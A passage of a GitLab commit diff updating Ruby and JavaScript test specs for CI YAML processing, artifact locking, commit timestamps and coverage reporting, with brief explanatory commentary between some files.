pipelineType | anglePosition | expanded
${downstreamProps} | ${'angle-right'} | ${false}
${downstreamProps} | ${'angle-left'} | ${true}
${upstreamProps} | ${'angle-left'} | ${false}
${upstreamProps} | ${'angle-right'} | ${true}
`(
'$pipelineType.columnTitle pipeline button icon should be $anglePosition if expanded state is $expanded',
({ pipelineType, anglePosition, expanded }) => {
createWrapper(pipelineType, { expanded });
expect(findExpandButton().props('icon')).toBe(anglePosition);
},
);
});
describe('when isLoading is true', () => {
@ -130,8 +188,8 @@ describe('Linked pipeline', () => {
createWrapper(props);
});
it('sets the loading prop to true', () => {
expect(findButton().props('loading')).toBe(true);
it('loading icon is visible', () => {
expect(findLoadingIcon().exists()).toBe(true);
});
});
@ -172,5 +230,10 @@ describe('Linked pipeline', () => {
findLinkedPipeline().trigger('mouseleave');
expect(wrapper.emitted().downstreamHovered).toStrictEqual([['']]);
});
it('should emit pipelineExpandToggle with job name and expanded state on click', () => {
findExpandButton().trigger('click');
expect(wrapper.emitted().pipelineExpandToggle).toStrictEqual([['trigger_job', true]]);
});
});
});

View File

@ -264,5 +264,11 @@ RSpec.describe Gitlab::Ci::Config::Normalizer do
is_expected.to match(config)
end
end
context 'when jobs config is nil' do
let(:config) { nil }
it { is_expected.to eq({}) }
end
end
end

View File

@ -312,7 +312,7 @@ RSpec.describe Gitlab::Ci::Config do
HEREDOC
end
it 'raises error YamlProcessor validationError' do
it 'raises ConfigError' do
expect { config }.to raise_error(
described_class::ConfigError,
"Included file `invalid` does not have YAML extension!"
@ -329,7 +329,7 @@ RSpec.describe Gitlab::Ci::Config do
HEREDOC
end
it 'raises error YamlProcessor validationError' do
it 'raises ConfigError' do
expect { config }.to raise_error(
described_class::ConfigError,
'Include `{"remote":"http://url","local":"/local/file.yml"}` needs to match exactly one accessor!'

View File

@ -157,7 +157,7 @@ RSpec.describe Gitlab::Ci::Lint do
it 'uses YamlProcessor' do
expect(Gitlab::Ci::YamlProcessor)
.to receive(:new_with_validation_errors)
.to receive(:new)
.and_call_original
subject

View File

@ -31,20 +31,20 @@ RSpec.describe Gitlab::Ci::Pipeline::Chain::Validate::External do
CI_YAML
end
let(:yaml_processor) do
let(:yaml_processor_result) do
::Gitlab::Ci::YamlProcessor.new(
ci_yaml, {
project: project,
sha: pipeline.sha,
user: user
}
)
).execute
end
let(:save_incompleted) { true }
let(:command) do
Gitlab::Ci::Pipeline::Chain::Command.new(
project: project, current_user: user, config_processor: yaml_processor, save_incompleted: save_incompleted
project: project, current_user: user, config_processor: yaml_processor_result, save_incompleted: save_incompleted
)
end

View File

@ -3,7 +3,7 @@
require 'spec_helper'
RSpec.describe 'CI YML Templates' do
subject { Gitlab::Ci::YamlProcessor.new(content) }
subject { Gitlab::Ci::YamlProcessor.new(content).execute }
let(:all_templates) { Gitlab::Template::GitlabCiYmlTemplate.all.map(&:full_name) }
@ -33,7 +33,7 @@ RSpec.describe 'CI YML Templates' do
end
it 'is valid' do
expect { subject }.not_to raise_error
expect(subject).to be_valid
end
it 'require default stages to be included' do

View File

@ -7,16 +7,16 @@ module Gitlab
RSpec.describe YamlProcessor do
include StubRequests
subject { described_class.new(config, user: nil) }
subject { described_class.new(config, user: nil).execute }
shared_examples 'returns errors' do |error_message|
it 'raises exception when error encountered' do
expect { subject }.to raise_error(described_class::ValidationError, error_message)
it 'adds a message when an error is encountered' do
expect(subject.errors).to include(error_message)
end
end
describe '#build_attributes' do
subject { described_class.new(config, user: nil).build_attributes(:rspec) }
subject { described_class.new(config, user: nil).execute.build_attributes(:rspec) }
describe 'attributes list' do
let(:config) do
@ -98,7 +98,7 @@ module Gitlab
config = YAML.dump({ default: { tags: %w[A B] },
rspec: { script: "rspec" } })
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -145,7 +145,7 @@ module Gitlab
config = YAML.dump({ default: { interruptible: true },
rspec: { script: "rspec" } })
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -474,9 +474,8 @@ module Gitlab
end
it 'is propagated all the way up into the raised exception' do
expect { subject }.to raise_error do |error|
expect(error.warnings).to contain_exactly(/jobs:rspec may allow multiple pipelines to run/)
end
expect(subject).not_to be_valid
expect(subject.warnings).to contain_exactly(/jobs:rspec may allow multiple pipelines to run/)
end
it_behaves_like 'returns errors', 'jobs:invalid:artifacts config should be a hash'
@ -493,10 +492,8 @@ module Gitlab
EOYML
end
it 'raises an exception with empty warnings array' do
expect { subject }.to raise_error do |error|
expect(error.warnings).to be_empty
end
it 'has empty warnings' do
expect(subject.warnings).to be_empty
end
it_behaves_like 'returns errors', 'Local file `unknown/file.yml` does not have project!'
@ -504,12 +501,9 @@ module Gitlab
context 'when error is raised after composing the config with warnings' do
shared_examples 'has warnings and expected error' do |error_message|
it 'raises an exception including warnings' do
expect { subject }.to raise_error do |error|
expect(error).to be_a(described_class::ValidationError)
expect(error.message).to match(error_message)
expect(error.warnings).to be_present
end
it 'returns errors and warnings', :aggregate_failures do
expect(subject.errors).to include(error_message)
expect(subject.warnings).to be_present
end
end
@ -590,7 +584,7 @@ module Gitlab
context 'when `only` has an invalid value' do
let(:config) { { rspec: { script: "rspec", type: "test", only: only } } }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
context 'when it is integer' do
let(:only) { 1 }
@ -614,7 +608,7 @@ module Gitlab
context 'when `except` has an invalid value' do
let(:config) { { rspec: { script: "rspec", except: except } } }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
context 'when it is integer' do
let(:except) { 1 }
@ -638,7 +632,7 @@ module Gitlab
describe "Scripts handling" do
let(:config_data) { YAML.dump(config) }
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config_data) }
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config_data).execute }
subject { config_processor.stage_builds_attributes('test').first }
@ -807,7 +801,7 @@ module Gitlab
before_script: ["pwd"],
rspec: { script: "rspec" } })
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -840,7 +834,7 @@ module Gitlab
command: ["/usr/local/bin/init", "run"] }, "docker:dind"],
script: "rspec" } })
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -871,7 +865,7 @@ module Gitlab
before_script: ["pwd"],
rspec: { script: "rspec" } })
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -898,7 +892,7 @@ module Gitlab
before_script: ["pwd"],
rspec: { image: "ruby:2.5", services: ["postgresql", "docker:dind"], script: "rspec" } })
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -922,9 +916,9 @@ module Gitlab
end
describe 'Variables' do
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
subject { config_processor.builds.first[:yaml_variables] }
let(:build_variables) { subject.builds.first[:yaml_variables] }
context 'when global variables are defined' do
let(:variables) do
@ -940,7 +934,7 @@ module Gitlab
end
it 'returns global variables' do
expect(subject).to contain_exactly(
expect(build_variables).to contain_exactly(
{ key: 'VAR1', value: 'value1', public: true },
{ key: 'VAR2', value: 'value2', public: true }
)
@ -968,7 +962,7 @@ module Gitlab
let(:inherit) { }
it 'returns all unique variables' do
expect(subject).to contain_exactly(
expect(build_variables).to contain_exactly(
{ key: 'VAR4', value: 'global4', public: true },
{ key: 'VAR3', value: 'global3', public: true },
{ key: 'VAR1', value: 'value1', public: true },
@ -981,7 +975,7 @@ module Gitlab
let(:inherit) { { variables: false } }
it 'does not inherit variables' do
expect(subject).to contain_exactly(
expect(build_variables).to contain_exactly(
{ key: 'VAR1', value: 'value1', public: true },
{ key: 'VAR2', value: 'value2', public: true }
)
@ -992,7 +986,7 @@ module Gitlab
let(:inherit) { { variables: %w[VAR1 VAR4] } }
it 'returns all unique variables and inherits only specified variables' do
expect(subject).to contain_exactly(
expect(build_variables).to contain_exactly(
{ key: 'VAR4', value: 'global4', public: true },
{ key: 'VAR1', value: 'value1', public: true },
{ key: 'VAR2', value: 'value2', public: true }
@ -1015,7 +1009,7 @@ module Gitlab
end
it 'returns job variables' do
expect(subject).to contain_exactly(
expect(build_variables).to contain_exactly(
{ key: 'VAR1', value: 'value1', public: true },
{ key: 'VAR2', value: 'value2', public: true }
)
@ -1041,8 +1035,8 @@ module Gitlab
# When variables config is empty, we assume this is a valid
# configuration, see issue #18775
#
expect(subject).to be_an_instance_of(Array)
expect(subject).to be_empty
expect(build_variables).to be_an_instance_of(Array)
expect(build_variables).to be_empty
end
end
end
@ -1057,14 +1051,14 @@ module Gitlab
end
it 'returns empty array' do
expect(subject).to be_an_instance_of(Array)
expect(subject).to be_empty
expect(build_variables).to be_an_instance_of(Array)
expect(build_variables).to be_empty
end
end
end
context 'when using `extends`' do
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config) }
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config).execute }
subject { config_processor.builds.first }
@ -1126,15 +1120,13 @@ module Gitlab
}
end
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config), opts) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config), opts).execute }
context "when validating a ci config file with no project context" do
context "when a single string is provided" do
let(:include_content) { "/local.gitlab-ci.yml" }
it "returns a validation error" do
expect { subject }.to raise_error /does not have project/
end
it_behaves_like 'returns errors', /does not have project/
end
context "when an array is provided" do
@ -1165,9 +1157,7 @@ module Gitlab
body: 'prepare: { script: ls -al }')
end
it "does not return any error" do
expect { subject }.not_to raise_error
end
it { is_expected.to be_valid }
end
context "when the include type is incorrect" do
@ -1188,9 +1178,7 @@ module Gitlab
.and_return(YAML.dump({ job1: { script: 'hello' } }))
end
it "does not return an error" do
expect { subject }.not_to raise_error
end
it { is_expected.to be_valid }
end
context "when the included internal file is not present" do
@ -1206,7 +1194,7 @@ module Gitlab
rspec: { script: 'rspec', when: when_state }
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
builds = config_processor.stage_builds_attributes("test")
expect(builds.size).to eq(1)
@ -1250,7 +1238,7 @@ module Gitlab
variables: { 'VAR1' => 1 } })
end
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config) }
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config).execute }
let(:builds) { config_processor.stage_builds_attributes('test') }
context 'when job is parallelized' do
@ -1366,7 +1354,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first[:cache]).to eq(
@ -1388,7 +1376,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first[:cache]).to eq(
@ -1407,7 +1395,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes('test').size).to eq(1)
expect(config_processor.stage_builds_attributes('test').first[:cache]).to eq(
@ -1430,7 +1418,7 @@ module Gitlab
}
)
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes('test').size).to eq(1)
expect(config_processor.stage_builds_attributes('test').first[:cache]).to eq(
@ -1453,7 +1441,7 @@ module Gitlab
}
)
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes('test').size).to eq(1)
expect(config_processor.stage_builds_attributes('test').first[:cache]).to eq(
@ -1473,7 +1461,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first[:cache]).to eq(
@ -1503,7 +1491,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -1539,7 +1527,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
builds = config_processor.stage_builds_attributes("test")
expect(builds.size).to eq(1)
@ -1555,7 +1543,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
builds = config_processor.stage_builds_attributes("test")
expect(builds.size).to eq(1)
@ -1591,14 +1579,14 @@ module Gitlab
- my/test/something
YAML
attributes = Gitlab::Ci::YamlProcessor.new(config).build_attributes('test')
attributes = Gitlab::Ci::YamlProcessor.new(config).execute.build_attributes('test')
expect(attributes.dig(*%i[options artifacts exclude])).to eq(%w[my/test/something])
end
end
describe "release" do
let(:processor) { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
let(:processor) { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
let(:config) do
{
stages: %w[build test release],
@ -1643,7 +1631,7 @@ module Gitlab
}
end
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
let(:builds) { subject.stage_builds_attributes('deploy') }
@ -1753,7 +1741,7 @@ module Gitlab
}
end
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
let(:builds) { subject.stage_builds_attributes('deploy') }
@ -1795,24 +1783,24 @@ module Gitlab
}
end
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
context 'no dependencies' do
let(:dependencies) { }
it { expect { subject }.not_to raise_error }
it { is_expected.to be_valid }
end
context 'dependencies to builds' do
let(:dependencies) { %w(build1 build2) }
it { expect { subject }.not_to raise_error }
it { is_expected.to be_valid }
end
context 'dependencies to builds defined as symbols' do
let(:dependencies) { [:build1, :build2] }
it { expect { subject }.not_to raise_error }
it { is_expected.to be_valid }
end
context 'undefined dependency' do
@ -1868,10 +1856,10 @@ module Gitlab
}
end
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
context 'no needs' do
it { expect { subject }.not_to raise_error }
it { is_expected.to be_valid }
end
context 'needs two builds' do
@ -2063,7 +2051,7 @@ module Gitlab
end
context 'with when/rules conflict' do
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
let(:config) do
{
@ -2079,9 +2067,7 @@ module Gitlab
}
end
it 'raises no exceptions' do
expect { subject }.not_to raise_error
end
it { is_expected.to be_valid }
it 'returns all jobs regardless of their inclusion' do
expect(subject.builds.count).to eq(config.keys.count)
@ -2120,7 +2106,7 @@ module Gitlab
end
describe "Hidden jobs" do
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config) }
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config).execute }
subject { config_processor.stage_builds_attributes("test") }
@ -2167,7 +2153,7 @@ module Gitlab
end
describe "YAML Alias/Anchor" do
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config) }
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config).execute }
subject { config_processor.stage_builds_attributes("build") }
@ -2264,7 +2250,7 @@ module Gitlab
})
end
it { expect { subject }.not_to raise_error }
it { is_expected.to be_valid }
end
context 'when job is not specified while artifact is' do
@ -2277,11 +2263,7 @@ module Gitlab
})
end
it do
expect { subject }.to raise_error(
described_class::ValidationError,
/include config must specify the job where to fetch the artifact from/)
end
it_behaves_like 'returns errors', /include config must specify the job where to fetch the artifact from/
end
context 'when include is a string' do
@ -2297,12 +2279,12 @@ module Gitlab
})
end
it { expect { subject }.not_to raise_error }
it { is_expected.to be_valid }
end
end
describe "Error handling" do
subject { described_class.new(config) }
subject { described_class.new(config).execute }
context 'when YAML syntax is invalid' do
let(:config) { 'invalid: yaml: test' }
@ -2651,8 +2633,8 @@ module Gitlab
end
end
describe '.new_with_validation_errors' do
subject { Gitlab::Ci::YamlProcessor.new_with_validation_errors(content) }
describe '#execute' do
subject { Gitlab::Ci::YamlProcessor.new(content).execute }
context 'when the YAML could not be parsed' do
let(:content) { YAML.dump('invalid: yaml: test') }
@ -2660,7 +2642,6 @@ module Gitlab
it 'returns errors and empty configuration' do
expect(subject.valid?).to eq(false)
expect(subject.errors).to eq(['Invalid configuration format'])
expect(subject.config).to be_blank
end
end
@ -2670,7 +2651,6 @@ module Gitlab
it 'returns errors and empty configuration' do
expect(subject.valid?).to eq(false)
expect(subject.errors).to eq(['jobs:rspec:tags config should be an array of strings'])
expect(subject.config).to be_blank
end
end
@ -2682,7 +2662,6 @@ module Gitlab
expect(subject.errors).to contain_exactly(
'jobs:rspec config contains unknown keys: bad_tags',
'jobs:rspec rules should be an array of hashes')
expect(subject.config).to be_blank
end
end
@ -2692,7 +2671,6 @@ module Gitlab
it 'returns errors and empty configuration' do
expect(subject.valid?).to eq(false)
expect(subject.errors).to eq(['Please provide content of .gitlab-ci.yml'])
expect(subject.config).to be_blank
end
end
@ -2702,7 +2680,6 @@ module Gitlab
it 'returns errors and empty configuration' do
expect(subject.valid?).to eq(false)
expect(subject.errors).to eq(['Unknown alias: bad_alias'])
expect(subject.config).to be_blank
end
end
@ -2712,7 +2689,7 @@ module Gitlab
it 'returns errors and empty configuration' do
expect(subject.valid?).to eq(true)
expect(subject.errors).to be_empty
expect(subject.config).to be_present
expect(subject.builds).to be_present
end
end
end
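The spec changes above reflect a move away from the raising, `new_with_validation_errors`-style API towards a single `Gitlab::Ci::YamlProcessor.new(...).execute` call that returns a result object. A minimal sketch of how a caller might consume that result, assuming only the methods exercised in the spec above (`valid?`, `errors`, `warnings`, `builds`); `ci_yaml` stands in for a pipeline configuration string and the error handling is illustrative, not upstream code:

# Sketch only: the result interface (#valid?, #errors, #warnings, #builds)
# is inferred from the expectations in the spec above.
result = Gitlab::Ci::YamlProcessor.new(ci_yaml, user: nil).execute

if result.valid?
  result.builds.each { |build| puts build[:name] } # build attribute hashes
else
  result.errors.each { |message| warn message }
end

result.warnings.each { |warning| warn "warning: #{warning}" }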

View File

@ -133,12 +133,6 @@ RSpec.describe Gitlab::ImportExport::FastHashSerializer do
expect(builds_count).to eq(1)
end
it 'has no when YML attributes but only the DB column' do
expect_any_instance_of(Gitlab::Ci::YamlProcessor).not_to receive(:build_attributes)
subject
end
it 'has pipeline commits' do
expect(subject['ci_pipelines']).not_to be_empty
end

View File

@ -381,12 +381,6 @@ RSpec.describe Gitlab::ImportExport::Project::TreeSaver do
expect(project_tree_saver.save).to be true
end
it 'has no when YML attributes but only the DB column' do
expect_any_instance_of(Gitlab::Ci::YamlProcessor).not_to receive(:build_attributes)
project_tree_saver.save
end
end
end

View File

@ -0,0 +1,14 @@
# frozen_string_literal: true
require 'spec_helper'
RSpec.describe Analytics::InstanceStatistics::Measurement, type: :model do
describe 'validation' do
let!(:measurement) { create(:instance_statistics_measurement) }
it { is_expected.to validate_presence_of(:recorded_at) }
it { is_expected.to validate_presence_of(:identifier) }
it { is_expected.to validate_presence_of(:count) }
it { is_expected.to validate_uniqueness_of(:recorded_at).scoped_to(:identifier) }
end
end

View File

@ -50,6 +50,7 @@ RSpec.describe Ci::Bridge do
CI_PROJECT_PATH_SLUG CI_PROJECT_NAMESPACE CI_PROJECT_ROOT_NAMESPACE
CI_PIPELINE_IID CI_CONFIG_PATH CI_PIPELINE_SOURCE CI_COMMIT_MESSAGE
CI_COMMIT_TITLE CI_COMMIT_DESCRIPTION CI_COMMIT_REF_PROTECTED
CI_COMMIT_TIMESTAMP
]
expect(bridge.scoped_variables_hash.keys).to include(*variables)

View File

@ -612,6 +612,46 @@ RSpec.describe Ci::Build do
end
end
describe '#locked_artifacts?' do
subject(:locked_artifacts) { build.locked_artifacts? }
context 'when pipeline is artifacts_locked' do
before do
build.pipeline.artifacts_locked!
end
context 'artifacts archive does not exist' do
let(:build) { create(:ci_build) }
it { is_expected.to be_falsy }
end
context 'artifacts archive exists' do
let(:build) { create(:ci_build, :artifacts) }
it { is_expected.to be_truthy }
end
end
context 'when pipeline is unlocked' do
before do
build.pipeline.unlocked!
end
context 'artifacts archive does not exist' do
let(:build) { create(:ci_build) }
it { is_expected.to be_falsy }
end
context 'artifacts archive exists' do
let(:build) { create(:ci_build, :artifacts) }
it { is_expected.to be_falsy }
end
end
end
describe '#available_artifacts?' do
let(:build) { create(:ci_build) }
@ -2329,6 +2369,7 @@ RSpec.describe Ci::Build do
{ key: 'CI_COMMIT_TITLE', value: pipeline.git_commit_title, public: true, masked: false },
{ key: 'CI_COMMIT_DESCRIPTION', value: pipeline.git_commit_description, public: true, masked: false },
{ key: 'CI_COMMIT_REF_PROTECTED', value: (!!pipeline.protected_ref?).to_s, public: true, masked: false },
{ key: 'CI_COMMIT_TIMESTAMP', value: pipeline.git_commit_timestamp, public: true, masked: false },
{ key: 'CI_BUILD_REF', value: build.sha, public: true, masked: false },
{ key: 'CI_BUILD_BEFORE_SHA', value: build.before_sha, public: true, masked: false },
{ key: 'CI_BUILD_REF_NAME', value: build.ref, public: true, masked: false },

View File

@ -715,6 +715,7 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do
CI_COMMIT_TITLE
CI_COMMIT_DESCRIPTION
CI_COMMIT_REF_PROTECTED
CI_COMMIT_TIMESTAMP
CI_BUILD_REF
CI_BUILD_BEFORE_SHA
CI_BUILD_REF_NAME
@ -3440,4 +3441,17 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do
it { is_expected.to eq(Gitlab::Git::TAG_REF_PREFIX + pipeline.source_ref.to_s) }
end
end
describe "#builds_with_coverage" do
it 'returns builds with coverage only' do
rspec = create(:ci_build, name: 'rspec', coverage: 97.1, pipeline: pipeline)
jest = create(:ci_build, name: 'jest', coverage: 94.1, pipeline: pipeline)
karma = create(:ci_build, name: 'karma', coverage: nil, pipeline: pipeline)
builds = pipeline.builds_with_coverage
expect(builds).to include(rspec, jest)
expect(builds).not_to include(karma)
end
end
end

View File

@ -4112,4 +4112,14 @@ RSpec.describe MergeRequest, factory_default: :keep do
expect(context[:label_url_method]).to eq(:project_merge_requests_url)
end
end
describe '#head_pipeline_builds_with_coverage' do
it 'delegates to head_pipeline' do
expect(subject)
.to delegate_method(:builds_with_coverage)
.to(:head_pipeline)
.with_prefix
.with_arguments(allow_nil: true)
end
end
end

View File

@ -329,6 +329,13 @@ RSpec.describe API::ProjectSnippets do
expect(snippet.description).to eq(new_description)
end
it 'updates snippet with visibility parameter' do
expect { update_snippet(params: { visibility: 'private' }) }
.to change { snippet.reload.visibility }
expect(snippet.visibility).to eq('private')
end
it 'returns 404 for invalid snippet id' do
update_snippet(snippet_id: non_existing_record_id, params: { title: 'foo' })
@ -340,6 +347,7 @@ RSpec.describe API::ProjectSnippets do
update_snippet
expect(response).to have_gitlab_http_status(:bad_request)
expect(json_response['error']).to eq 'title, file_name, content, visibility are missing, at least one parameter must be provided'
end
it 'returns 400 if content is blank' do

View File

@ -188,25 +188,31 @@ RSpec.describe BuildDetailsEntity do
context 'when the build has expired artifacts' do
let!(:build) { create(:ci_build, :artifacts, artifacts_expire_at: 7.days.ago) }
it 'does not expose any artifact actions path' do
expect(subject[:artifact].keys).not_to include(:download_path, :browse_path, :keep_path)
end
context 'when pipeline is unlocked' do
before do
build.pipeline.unlocked!
end
it 'artifact locked is false' do
expect(subject.dig(:artifact, :locked)).to eq(false)
it 'artifact locked is false' do
expect(subject.dig(:artifact, :locked)).to eq(false)
end
it 'does not expose any artifact actions path' do
expect(subject[:artifact].keys).not_to include(:download_path, :browse_path, :keep_path)
end
end
context 'when the pipeline is artifacts_locked' do
before do
build.pipeline.update!(locked: :artifacts_locked)
build.pipeline.artifacts_locked!
end
it 'artifact locked is true' do
expect(subject.dig(:artifact, :locked)).to eq(true)
end
it 'exposes download and browse artifact actions path' do
expect(subject[:artifact].keys).to include(:download_path, :browse_path)
it 'exposes download, browse and keep artifact actions path' do
expect(subject[:artifact].keys).to include(:download_path, :browse_path, :keep_path)
end
end
end

View File

@ -285,4 +285,20 @@ RSpec.describe MergeRequestPollWidgetEntity do
end
end
end
describe '#builds_with_coverage' do
it 'serializes the builds with coverage' do
allow(resource).to receive(:head_pipeline_builds_with_coverage).and_return([
double(name: 'rspec', coverage: 91.5),
double(name: 'jest', coverage: 94.1)
])
result = subject[:builds_with_coverage]
expect(result).to eq([
{ name: 'rspec', coverage: 91.5 },
{ name: 'jest', coverage: 94.1 }
])
end
end
end
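Read together with the poll-widget JSON schema change earlier in this commit, the entity spec above suggests the widget payload gains a builds_with_coverage array of name/coverage pairs alongside a pipeline_coverage_delta field. An illustrative Ruby hash of that fragment; the keys come from the schema and the spec, the numbers are invented for the example:

# Illustrative payload fragment only; values are made up.
{
  pipeline_coverage_delta: 3.0,
  builds_with_coverage: [
    { name: 'rspec', coverage: 91.5 },
    { name: 'jest',  coverage: 94.1 }
  ]
}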

View File

@ -11,6 +11,10 @@ RSpec.describe Ci::DestroyExpiredJobArtifactsService, :clean_gitlab_redis_shared
let(:service) { described_class.new }
let!(:artifact) { create(:ci_job_artifact, expire_at: 1.day.ago) }
before do
artifact.job.pipeline.unlocked!
end
context 'when artifact is expired' do
context 'when artifact is not locked' do
before do
@ -88,6 +92,8 @@ RSpec.describe Ci::DestroyExpiredJobArtifactsService, :clean_gitlab_redis_shared
before do
stub_const('Ci::DestroyExpiredJobArtifactsService::LOOP_LIMIT', 1)
stub_const('Ci::DestroyExpiredJobArtifactsService::BATCH_SIZE', 1)
second_artifact.job.pipeline.unlocked!
end
let!(:second_artifact) { create(:ci_job_artifact, expire_at: 1.day.ago) }
@ -102,7 +108,9 @@ RSpec.describe Ci::DestroyExpiredJobArtifactsService, :clean_gitlab_redis_shared
end
context 'when there are no artifacts' do
let!(:artifact) { }
before do
artifact.destroy!
end
it 'does not raise error' do
expect { subject }.not_to raise_error
@ -112,6 +120,8 @@ RSpec.describe Ci::DestroyExpiredJobArtifactsService, :clean_gitlab_redis_shared
context 'when there are artifacts more than batch sizes' do
before do
stub_const('Ci::DestroyExpiredJobArtifactsService::BATCH_SIZE', 1)
second_artifact.job.pipeline.unlocked!
end
let!(:second_artifact) { create(:ci_job_artifact, expire_at: 1.day.ago) }
@ -126,6 +136,10 @@ RSpec.describe Ci::DestroyExpiredJobArtifactsService, :clean_gitlab_redis_shared
let!(:pipeline_artifact_1) { create(:ci_pipeline_artifact, expire_at: 1.week.ago) }
let!(:pipeline_artifact_2) { create(:ci_pipeline_artifact, expire_at: 1.week.ago) }
before do
[pipeline_artifact_1, pipeline_artifact_2].each { |pipeline_artifact| pipeline_artifact.pipeline.unlocked! }
end
it 'destroys pipeline artifacts' do
expect { subject }.to change { Ci::PipelineArtifact.count }.by(-2)
end
@ -135,10 +149,26 @@ RSpec.describe Ci::DestroyExpiredJobArtifactsService, :clean_gitlab_redis_shared
let!(:pipeline_artifact_1) { create(:ci_pipeline_artifact, expire_at: 2.days) }
let!(:pipeline_artifact_2) { create(:ci_pipeline_artifact, expire_at: 2.days) }
it 'do not destroy pipeline artifacts' do
before do
[pipeline_artifact_1, pipeline_artifact_2].each { |pipeline_artifact| pipeline_artifact.pipeline.unlocked! }
end
it 'does not destroy pipeline artifacts' do
expect { subject }.not_to change { Ci::PipelineArtifact.count }
end
end
end
context 'when some artifacts are locked' do
before do
pipeline = create(:ci_pipeline, locked: :artifacts_locked)
job = create(:ci_build, pipeline: pipeline)
create(:ci_job_artifact, expire_at: 1.day.ago, job: job)
end
it 'destroys only unlocked artifacts' do
expect { subject }.to change { Ci::JobArtifact.count }.by(-1)
end
end
end
end
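The added before blocks in the service spec above suggest that expired artifacts are now only removed once their pipeline is unlocked. A minimal sketch using the same factories as the spec, assuming the service's entry point is #execute and that pipelines no longer default to the unlocked state (hence the explicit unlocked!/artifacts_locked! calls):

# Sketch under the assumptions stated above; mirrors the
# 'destroys only unlocked artifacts' example in the spec.
expired = create(:ci_job_artifact, expire_at: 1.day.ago)
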